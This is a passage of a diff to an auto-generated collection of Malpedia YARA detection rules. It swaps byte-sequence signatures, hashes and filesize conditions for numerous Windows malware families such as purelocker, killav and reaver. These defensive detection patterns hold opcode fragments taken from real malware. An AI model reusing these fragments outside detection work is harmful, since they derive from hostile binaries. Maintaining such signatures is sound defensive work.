+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gcleaner_auto.yar#L1-L110"
 		license_url = "N/A"
-		logic_hash = "869a5323254bb19be34889ba3dd9fff300dc452318f40f9c34e9c0c7014796e1"
+		logic_hash = "46f1f4e86df7721d1ed8e6509c63180bfe445457c94a26b5c8b0a0ee89dd2952"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85243,39 +85518,32 @@ rule MALPEDIA_Win_Sdbbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf0 56 8975fc ff55ec }
-		$sequence_1 = { 81f95bbc4a6a 0f85cf000000 8b5dfc bf04000000 8b7310 8b463c 8b443078 }
-		$sequence_2 = { ff55e8 8bd8 85db 7460 }
-		$sequence_3 = { 8b75fc 8b7dec 83c714 897dec 833f00 }
-		$sequence_4 = { 33c9 8a02 660f1f440000 c1c90d 8d5201 }
-		$sequence_5 = { 8b5b10 8b433c 8b441878 03c3 8945dc }
-		$sequence_6 = { 84c0 75ef 81f9b80a4c53 7521 8b45dc 0fb70e }
-		$sequence_7 = { 81c2ffff0000 03cf 46 6685d2 }
-		$sequence_8 = { c3 803d????????00 750c c605????????01 }
-		$sequence_9 = { 0fb602 84c0 75ed 81f9b80a4c53 751b }
-		$sequence_10 = { 488b5c2478 41bb01000000 4d85f6 7414 }
-		$sequence_11 = { 49ffca 0fb7ca 0fb7c2 66c1e90c 6683f90a 7514 }
-		$sequence_12 = { 0fb602 0f1f440000 c1c90d 488d5201 0fbec0 03c8 }
-		$sequence_13 = { 4c89b42480000000 41bd04000000 e9???????? 3d5d68fa3c 0f859e000000 4d8b5720 }
-		$sequence_14 = { 664585db 75ac 4c8bb42480000000 41b9ffff0000 488b5c2478 }
-		$sequence_15 = { 4963553c 488d4ac0 4881f9bf030000 770a 42813c2a50450000 7405 }
-		$sequence_16 = { 4885d2 7417 4d8bc6 4d2bc5 0fb601 41880408 488d4901 }
+		$sequence_0 = { 8bd0 c645fc04 8d4dd8 e8???????? 83c410 }
+		$sequence_1 = { c645fc02 8d4da8 e8???????? 57 }
+		$sequence_2 = { 8035????????2e 8035????????2e 8035????????2e 342e }
+		$sequence_3 = { 6800004080 6a00 6a00 6a00 }
+		$sequence_4 = { 89b5f4feffff ff15???????? 8bf8 85ff }
+		$sequence_5 = { 5e c9 c3 53 ff7518 }
+		$sequence_6 = { 7404 2bfb eb03 83cfff 3bf7 }
+		$sequence_7 = { 8035????????2e 8035????????2e 342e a2???????? }
+		$sequence_8 = { 6a04 8d85f0feffff 50 56 }
+		$sequence_9 = { 8d8d60ffffff e8???????? 6a00 6a00 8d4dd8 e8???????? 50 }
 
 	condition:
-		7 of them and filesize < 1015808
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Purelocker_Auto : FILE
+rule MALPEDIA_Win_Fishmaster_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "53ddd96f-5e42-581c-bfdc-76e557b9eeb0"
+		id = "c7f73382-0b3e-516e-ada8-2592a288859c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purelocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.purelocker_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fishmaster"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fishmaster_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "cefb5bbad76b31deb583172c70f982572bba50fe45f5283eaffece3891fb88ee"
+		logic_hash = "2d3700642fa743154e0272490d462793baad4e202db4b6b6f02f2c7c184ce851"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85289,32 +85557,32 @@ rule MALPEDIA_Win_Purelocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83e20f 53 56 8b742430 8d1c02 8b442438 c1fb04 }
-		$sequence_1 = { 5b 5f 83fb00 7505 83ff00 7404 31c0 }
-		$sequence_2 = { 898424c0000000 8b9c24c0000000 21db 744e ffb424bc000000 e8???????? }
-		$sequence_3 = { 5f 3bbc249c000000 7f0f 7c09 3b9c2498000000 7704 }
-		$sequence_4 = { e8???????? 8b542418 52 e8???????? 5a 50 52 }
-		$sequence_5 = { 5f 6a0c 6a00 ff35???????? ff15???????? }
-		$sequence_6 = { 85c0 746f 0fb708 8bf8 6a22 5a 663bca }
-		$sequence_7 = { 8d4508 50 e8???????? 8b4c2420 83c410 890f 8b4c2414 }
-		$sequence_8 = { ff742454 e8???????? 89442450 8b5c2450 21db 7516 }
-		$sequence_9 = { 33c1 894f10 8b4f08 894714 33c8 8bc3 894f18 }
+		$sequence_0 = { 410fbe4c0101 8d41bf 3c19 7705 8d69bf eb28 }
+		$sequence_1 = { 4489442420 488bcb 488b4318 4883f810 7203 488b0b }
+		$sequence_2 = { 448d5701 4885c0 0f8e17030000 4d8bcc 4c89642428 448bac2498000000 }
+		$sequence_3 = { 7203 488b0b 488bd5 4889542438 }
+		$sequence_4 = { 8d41bf 41b83f000000 3c19 7706 448d61bf eb2b }
+		$sequence_5 = { 4533c9 33d2 458d4103 488d0dc51e0000 ff15???????? 4c89742438 488d4c2468 }
+		$sequence_6 = { 7705 8d71bf eb28 8d419f 3c19 }
+		$sequence_7 = { ff15???????? cc 4885c9 7407 e8???????? eb02 }
+		$sequence_8 = { 482bc5 4883c0f8 4883f81f 7607 ff15???????? }
+		$sequence_9 = { 4883f801 721c 488d4101 48894310 4883fa10 488bc3 7203 }
 
 	condition:
-		7 of them and filesize < 193536
+		7 of them and filesize < 812032
 }
-rule MALPEDIA_Win_Opachki_Auto : FILE
+rule MALPEDIA_Win_Cryptic_Convo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "291586d9-b070-57a5-aa2e-28c307c908af"
+		id = "ee0bcadb-9b51-5f84-8a43-144a3ffa84ad"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.opachki_auto.yar#L1-L164"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptic_convo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cryptic_convo_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "d90c4672bb521b58f2551b67ed4270be91d6ae941a1e85079915797925d00bdb"
+		logic_hash = "ba224512d1d5c20e7f8dff36dcd163b0f00725bbb0cb250e1837ecee50522cf5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85328,37 +85596,32 @@ rule MALPEDIA_Win_Opachki_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33f6 56 6806000200 56 56 }
-		$sequence_1 = { 2b45f8 ebf2 55 8bec 8b4508 57 }
-		$sequence_2 = { 8b450c 56 8b7108 3bc6 7205 83c8ff }
-		$sequence_3 = { 6a0d 68???????? 8d4ddc e8???????? 68ff000000 8d85d4feffff 50 }
-		$sequence_4 = { c3 55 8bec 81ec00010000 ff7508 }
-		$sequence_5 = { ff15???????? 83c40c 8b4f04 8d0433 }
-		$sequence_6 = { ff15???????? 8b35???????? 6a00 bf80000000 57 6a03 6a00 }
-		$sequence_7 = { 7413 8b4704 03c8 53 51 03c6 }
-		$sequence_8 = { 752b 46 88470c 88c4 c0ec06 88670d }
-		$sequence_9 = { 7427 f6c140 7412 08d2 7408 66ad }
-		$sequence_10 = { 3c65 7505 884703 ebcc }
-		$sequence_11 = { ac 7710 80fff6 7503 }
-		$sequence_12 = { 61 c3 898389838983 898389838983 898389838585 858585858585 }
-		$sequence_13 = { 99 b125 f3aa 83ef25 8b742424 ac }
-		$sequence_14 = { 3cf2 7505 884701 ebf2 3cf0 7505 884702 }
+		$sequence_0 = { e8???????? ff35???????? ff15???????? 8b06 8bce ff9064010000 }
+		$sequence_1 = { 8d9ddcfcffff e8???????? 59 59 85c0 0f8406020000 }
+		$sequence_2 = { 6a00 50 e8???????? be???????? 8d7dc8 a5 }
+		$sequence_3 = { c3 8b442404 33d2 f7742408 85d2 7505 8b442404 }
+		$sequence_4 = { 53 eb25 803d????????01 741b 803d????????01 }
+		$sequence_5 = { 85f6 7508 ff15???????? eb06 ff15???????? }
+		$sequence_6 = { 8d85e0fcffff 50 66a5 ffd3 59 59 85c0 }
+		$sequence_7 = { 8b85ecfcffff 8b95f4fcffff 53 ff7510 89540134 50 }
+		$sequence_8 = { 5e e8???????? c9 c3 e8???????? c20400 }
+		$sequence_9 = { 75f8 be???????? a5 a5 8d85c0fdffff 50 66a5 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 97280
 }
-rule MALPEDIA_Win_Furtim_Auto : FILE
+rule MALPEDIA_Win_Thunderx_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "13c151d6-8fd6-5f90-84f5-0ee50200b32d"
+		id = "1bae1fb1-24b0-5f06-bb80-f0ccbc902def"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.furtim_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.thunderx_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "fe578793812b3cd44b1ebd86df72331630f9c46ef93b0c93a291bf5ca64790a1"
+		logic_hash = "5011033895d94d0840d4177429f3e9775d789a180c5872dc899a5e5b8dd320c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85372,32 +85635,32 @@ rule MALPEDIA_Win_Furtim_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 8d7df8 ab 8d45f4 50 8d45dc 50 }
-		$sequence_1 = { 5a ff91fc020000 ebd7 5e c3 6a03 e8???????? }
-		$sequence_2 = { 7432 395d08 752d 395df0 7424 8b45f8 68???????? }
-		$sequence_3 = { 53 8d4dfc 51 53 895dfc ffd0 83f87a }
-		$sequence_4 = { 7520 8d55d8 8bce ff567c 8d45d8 }
-		$sequence_5 = { 897dfc 897df8 c745f424000000 ff9650040000 }
-		$sequence_6 = { c21000 55 8d6c2488 81ece8000000 53 }
-		$sequence_7 = { 50 ff93f0030000 8d45f4 50 ff93bc040000 648b3d18000000 }
-		$sequence_8 = { c7459018334400 c7459420334400 c745982c334400 c7459c38334400 c745a044334400 c745a454334400 c74500???????? }
-		$sequence_9 = { ff9618050000 5f 5e 5b c9 c20c00 ff7508 }
+		$sequence_0 = { 8b4598 03c1 894d8c 6a0d 50 e8???????? 33f8 }
+		$sequence_1 = { 57 b9???????? e8???????? 83f8ff 7413 837e1410 7202 }
+		$sequence_2 = { e8???????? 83c618 3b742428 75f0 8d4c2424 e8???????? e8???????? }
+		$sequence_3 = { e8???????? 83c618 8975c0 eb0d 57 56 }
+		$sequence_4 = { 8b36 53 56 ff7710 50 e8???????? 5e }
+		$sequence_5 = { 50 ff15???????? 85c0 0f85b7000000 837e1408 7202 8b36 }
+		$sequence_6 = { 56 57 6a66 50 ff15???????? 51 50 }
+		$sequence_7 = { e8???????? eb24 8d4de0 e8???????? }
+		$sequence_8 = { 8932 897204 897208 5e 5d c20400 6a18 }
+		$sequence_9 = { 57 8955fc 8b7a14 8bc7 8b7210 2bc6 }
 
 	condition:
-		7 of them and filesize < 622592
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Typehash_Auto : FILE
+rule MALPEDIA_Win_Whiskerspy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "edf296ed-fbc4-5bd8-b180-ef55e989c944"
+		id = "1f71cc7d-dee3-58c1-b7e7-0db4f27f7b73"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.typehash"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.typehash_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whiskerspy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.whiskerspy_auto.yar#L1-L152"
 		license_url = "N/A"
-		logic_hash = "9451e6a97a0b537ea280e22049617c90fd5aa93257a4b129bfda6427a2eb4eeb"
+		logic_hash = "42f604644f01d6d1eab2ff27df4abe182b18b8311684ef0837061e88ea8bd127"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85411,32 +85674,37 @@ rule MALPEDIA_Win_Typehash_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83e11f 8b0485e03d4100 8d04c8 eb05 b8???????? f6400420 740d }
-		$sequence_1 = { c3 8bc8 83e01f c1f905 8b0c8de03d4100 8a44c104 }
-		$sequence_2 = { e8???????? 6a01 8d4c2450 c68424cc00000001 e8???????? bf???????? }
-		$sequence_3 = { 8944240c c744241004000000 7460 8b2d???????? 8b3d???????? }
-		$sequence_4 = { c1f805 c1e603 8d1c85e03d4100 8b0485e03d4100 03c6 8a5004 }
-		$sequence_5 = { 50 51 6813000020 56 c744242000000000 c744242404000000 ffd7 }
-		$sequence_6 = { 03c8 3bc1 7d1e 8d1440 2bc8 8d1495e8294100 832200 }
-		$sequence_7 = { 3bf3 7505 be???????? 8b54242c 8b442430 8bcf 55 }
-		$sequence_8 = { 837d1805 7538 837d1000 7508 8bb6b42b4100 }
-		$sequence_9 = { e8???????? 68???????? 8d45c8 c745c8e4e74000 50 }
+		$sequence_0 = { 33ff 8b06 8bcf d3e8 }
+		$sequence_1 = { b867666666 f7e9 488d5c2430 c1fa02 8bc2 }
+		$sequence_2 = { 884c9c4b 48ffc3 4883fb08 7cd2 0f10442420 }
+		$sequence_3 = { 488d0d26120100 483bc1 746d 488b83e0000000 }
+		$sequence_4 = { 4963cd 488d3409 4c8bc6 488bd7 488bc8 }
+		$sequence_5 = { 4c63c2 4d03c0 498d0c3e 488d557c }
+		$sequence_6 = { 488bd8 4885c0 7511 498bce ff15???????? }
+		$sequence_7 = { 90 488b4c2468 e8???????? 90 8bc3 }
+		$sequence_8 = { 8a85f4f9ffff 8a840df4f9ffff 2c6c 3440 }
+		$sequence_9 = { c685c5f9ffff69 c685c6f9ffff5a c685c7f9ffff60 c685c8f9ffff5d }
+		$sequence_10 = { 2c09 3445 88840dccfeffff 41 83f90a 72e8 }
+		$sequence_11 = { 1b7c240c 8b4130 2918 8b4120 0110 eb23 }
+		$sequence_12 = { eb06 8b4510 8b750c 837f4c00 8945f0 }
+		$sequence_13 = { 3daaaaaa0a 0f84da000000 8d5801 8b4608 2b06 99 }
+		$sequence_14 = { 8b00 8d8d38fcffff 51 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 591872
 }
-rule MALPEDIA_Win_Rgdoor_Auto : FILE
+rule MALPEDIA_Win_Purplewave_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c131d66d-fa54-5330-a7a6-924c788ac07b"
+		id = "a8fab1de-de14-5b36-888a-a891d75c38a4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rgdoor_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.purplewave_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "e436d1f0b319cc823655f3b279c99c1561f88f885f295d5e38aafb91490652b3"
+		logic_hash = "ec1dbe620cafbb0b6c5ed6f89052ebc62f770f57ab87864e785a226f41ace5e3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85450,34 +85718,34 @@ rule MALPEDIA_Win_Rgdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 740a e9???????? 418bfe eb05 bf02000000 418bd6 4533c9 }
-		$sequence_1 = { 488d0dc59d0200 ff15???????? ff15???????? 33c0 }
-		$sequence_2 = { 41c644070889 498b04d0 418064073880 498b04d0 }
-		$sequence_3 = { 488d4d98 e8???????? 90 498d4d04 488d150b8c0200 e8???????? 488bd8 }
-		$sequence_4 = { 43881410 49ffc0 3bcb 0f8c42ffffff }
-		$sequence_5 = { c64405c000 48ffc0 4883f803 7cf0 440fb66dc2 440fb67dc1 }
-		$sequence_6 = { 488d05b9a40100 740f 3908 740e 4883c010 4883780800 }
-		$sequence_7 = { 488d05b97cfeff 4a8b84e8503f0300 400f95c7 03f6 42897c3048 e9???????? 397de8 }
-		$sequence_8 = { 48897c2420 4156 4883ec20 4c8bc2 4863f1 33c0 4885d2 }
-		$sequence_9 = { 41b803010000 488bd6 e8???????? 4889842490000000 4885c0 0f8435010000 381e }
+		$sequence_0 = { 7c37 8a16 8bc7 80fa39 7f2e 0fbe07 8d4f01 }
+		$sequence_1 = { 8b0495201e4900 885c012e 8b0495201e4900 804c012d04 46 ebb0 ff15???????? }
+		$sequence_2 = { e8???????? 6a13 e8???????? 8bf0 59 6a17 c7063519ef54 }
+		$sequence_3 = { 85c0 754c 8b45ec 85c0 7445 33c9 6a02 }
+		$sequence_4 = { e8???????? 50 8d8d08ffffff e8???????? 81cb00000100 ffb52cffffff 8d8508ffffff }
+		$sequence_5 = { 8bcc 68???????? 8937 e8???????? 8bcf e8???????? 84c0 }
+		$sequence_6 = { 8903 894624 e8???????? c20800 6a64 b8???????? e8???????? }
+		$sequence_7 = { 6a02 8955ec 8b0485201e4900 5f 894df4 c644032b0a 8b5d08 }
+		$sequence_8 = { 50 e8???????? 83c40c 8d4d88 e8???????? 8d0477 }
+		$sequence_9 = { 8bc3 e8???????? c20c00 807f4900 740d 8d4f10 51 }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 1400832
 }
-rule MALPEDIA_Win_Redleaves_Auto : FILE
+rule MALPEDIA_Win_Telb_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9f7b8b12-c503-5485-9c53-56cd6e66e380"
+		id = "2c2db826-44da-51b3-a002-12e7b8aba209"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.redleaves_auto.yar#L1-L172"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.telb"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.telb_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "3dce4e217425a30687e485e0f532b16bc2ee15eb23b5abe81e3322015aee4687"
+		logic_hash = "0475afe77557694f44f95a279ca9003eacdaca59e84d15417e917ac04b83cab7"
 		score = 75
-		quality = 69
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -85489,40 +85757,32 @@ rule MALPEDIA_Win_Redleaves_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89f9 8d64241c d2c0 8a01 }
-		$sequence_1 = { 51 7565 7279 55 7365 7254 }
-		$sequence_2 = { 11d2 83e901 0f85edffffff 89d0 29f8 5f 5b }
-		$sequence_3 = { 9c 894504 9c 9c }
-		$sequence_4 = { 47 657449 7041 64647254 }
-		$sequence_5 = { 57 54 53 51 7565 7279 }
-		$sequence_6 = { 7440 ff7508 ffd0 59 }
-		$sequence_7 = { 60 9c e8???????? f8 }
-		$sequence_8 = { 6a0c 81c100020000 51 6a26 }
-		$sequence_9 = { 5b 85ff 7509 49 48 c745fc7a000780 }
-		$sequence_10 = { 54 9c 60 9c }
-		$sequence_11 = { 8bec ff7508 81c160010000 e8???????? }
-		$sequence_12 = { 85c0 746b 53 53 }
-		$sequence_13 = { 83662000 33c0 40 5e }
-		$sequence_14 = { 8bec ff7508 81c17c010000 e8???????? }
-		$sequence_15 = { 8bec ff7508 81c104010000 e8???????? 33c0 40 5d }
-		$sequence_16 = { 9c 8f442428 880424 e8???????? }
-		$sequence_17 = { e8???????? 895500 9c e8???????? }
+		$sequence_0 = { 89742418 81fefeffff7f 7607 befeffff7f }
+		$sequence_1 = { 89bd38eeffff 33c0 89bd48eeffff 8bbd80efffff }
+		$sequence_2 = { 03048d08e34100 50 ff15???????? 5d c3 8bff 55 }
+		$sequence_3 = { f30f7e4010 668908 8d4c2460 660fd6442470 }
+		$sequence_4 = { ff15???????? 83fe64 7cb2 8b8518eeffff 85c0 0f85b7000000 6a28 }
+		$sequence_5 = { e8???????? 833d????????00 7426 68???????? ba???????? 8d4c2464 e8???????? }
+		$sequence_6 = { 52 51 e8???????? 83c408 8b542444 33c0 c744245800000000 }
+		$sequence_7 = { 6a0d 68???????? 8d8d88efffff e8???????? 83bd0cefffff08 8d85f8eeffff 56 }
+		$sequence_8 = { 83c404 8bc8 c645fc39 e8???????? 8d8d10efffff e8???????? 8d8db8efffff }
+		$sequence_9 = { 6689442438 e8???????? 8d4c2430 e8???????? 8d4c2430 e8???????? }
 
 	condition:
-		7 of them and filesize < 1679360
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Hazy_Load_Auto : FILE
+rule MALPEDIA_Win_Killav_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fbfa1e78-dff1-53dc-80af-71732a4c81b4"
+		id = "6ea8eddf-089b-50a4-8f27-4f9ec3d8cbec"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hazy_load"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hazy_load_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.killav"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.killav_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "fd77b624c32a8e3f12aae94d42471fe8468beed29de311ba6e72f1538f11b350"
+		logic_hash = "ff0be756557cba2c394e4d12fd6850def3f48f4054b3fe5a54c94ab0f930267a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85536,79 +85796,73 @@ rule MALPEDIA_Win_Hazy_Load_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 418bcc 448d4205 ff15???????? 488bd8 }
-		$sequence_1 = { 488d0d70e70000 f6413820 74b7 33d2 418bc9 448d4202 }
-		$sequence_2 = { 418d4102 83f801 761e 498bc9 488d153bfb0000 83e13f 498bc1 }
-		$sequence_3 = { 4c8d05e3f8ffff 4889442428 4533c9 33d2 89442420 }
-		$sequence_4 = { 488d1588f4feff c1e803 89442448 448be0 89442440 85c0 0f84d3030000 }
-		$sequence_5 = { 483b0d???????? 7417 488d0570630100 483bc8 740b 83791000 7505 }
-		$sequence_6 = { 488d0d386a0100 488bc3 83e33f 48c1f806 48c1e306 }
-		$sequence_7 = { ff15???????? 41b810000000 488d542420 488bcb }
-		$sequence_8 = { 4883ec20 488d3d93690100 48393d???????? 742b }
-		$sequence_9 = { eb12 488d0d46fe0000 c7435006000000 48894b48 c6435400 }
+		$sequence_0 = { 8b049d70ba4300 f644012801 0f8487000000 817d10ffffff7f }
+		$sequence_1 = { c705????????a0a74300 e8???????? 68???????? 50 }
+		$sequence_2 = { 8d45f4 64a300000000 8bc1 8945e8 817804ffffff07 8b08 8b7d08 }
+		$sequence_3 = { ff34f518054300 ff7508 e8???????? 83c40c }
+		$sequence_4 = { 6bc838 894de0 8b049d70ba4300 f644012801 0f8487000000 817d10ffffff7f }
+		$sequence_5 = { 7603 6a26 58 0fb60c855ed34200 0fb634855fd34200 8bf9 898598f8ffff }
+		$sequence_6 = { 8945ec 83c001 0f92c1 f7d9 0bc8 81f9ffffff7f }
+		$sequence_7 = { c745ec07000000 668945d8 e8???????? 8d45d8 c645fc2a 50 8d4dd0 }
+		$sequence_8 = { c745ec07000000 668945d8 e8???????? 8d45d8 c645fc33 50 8d4dd0 }
+		$sequence_9 = { 8b04bd70ba4300 834c0318ff 33c0 eb16 e8???????? }
 
 	condition:
-		7 of them and filesize < 315392
+		7 of them and filesize < 517120
 }
-rule MALPEDIA_Win_Medusa_Auto : FILE
+rule MALPEDIA_Win_Reaver_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e5ced166-c5f3-50c0-9e84-e449f6bff889"
-		date = "2023-12-06"
-		modified = "2023-12-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.medusa_auto.yar#L1-L167"
+		id = "3d8bacff-8149-5ea1-b108-9a71e294cb35"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.reaver_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "b88f5d47ff30b39fc78331a46c037d026177b73d253964f40555a9ce1312bb08"
+		logic_hash = "48c5b411e85068c0dc8fd141ff59dabcc3c0e5a62fed45c81149c84c9623f348"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20231130"
-		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
-		malpedia_version = "20230808"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 680049ff69 004aff 6a00 4b ff6b00 4c ff6c004d }
-		$sequence_1 = { 1a03 69c421f3ef6a 2048b3 a5 }
-		$sequence_2 = { 52 ff7200 53 ff7300 54 }
-		$sequence_3 = { 317f52 56 5c ab 92 6f 0c48 }
-		$sequence_4 = { 9e 45 334a54 98 56 39ec 51 }
-		$sequence_5 = { 9f c48b2addd977 7612 a5 ba3c533f71 }
-		$sequence_6 = { e60e 6c 7bbc 45 }
-		$sequence_7 = { 54 ff740055 ff7500 56 }
-		$sequence_8 = { 99 5f 68066e570a 4f bfdb4a7adc }
-		$sequence_9 = { 1ddf859f31 e476 0c48 ce 74ec 1b826a013061 }
-		$sequence_10 = { 2a18 ae 085ffb cf }
-		$sequence_11 = { b5f9 43 324dd5 1ddf859f31 e476 0c48 }
-		$sequence_12 = { 5f e1fb 1cc9 3ca5 2c8e a1???????? d528 }
-		$sequence_13 = { b051 9f 4a d7 b9533e507c }
-		$sequence_14 = { 6c 6f aa 97 691c85470859bab566c1a5 }
-		$sequence_15 = { 813bf80937dc 8b4c6386 8608 5f }
+		$sequence_0 = { ff15???????? 85c0 7440 8b45f4 6a00 }
+		$sequence_1 = { 3d14050000 7504 33c0 c9 c3 }
+		$sequence_2 = { 50 68ff010f00 ff15???????? 50 ff15???????? 85c0 7453 }
+		$sequence_3 = { 740d ff15???????? 3d14050000 7504 33c0 c9 }
+		$sequence_4 = { 85c0 7440 8b45f4 6a00 8945e8 }
+		$sequence_5 = { 85c0 740d ff15???????? 3d14050000 7504 33c0 c9 }
+		$sequence_6 = { 7440 8b45f4 6a00 8945e8 }
+		$sequence_7 = { 7504 33c0 c9 c3 ff75fc ff15???????? 6a01 }
+		$sequence_8 = { 8bec 83ec1c 8d45fc 50 68ff010f00 ff15???????? }
+		$sequence_9 = { 6a00 ff15???????? 85c0 7440 8b45f4 }
 
 	condition:
-		7 of them and filesize < 1720320
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Grease_Auto : FILE
+rule MALPEDIA_Win_Nimrev_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
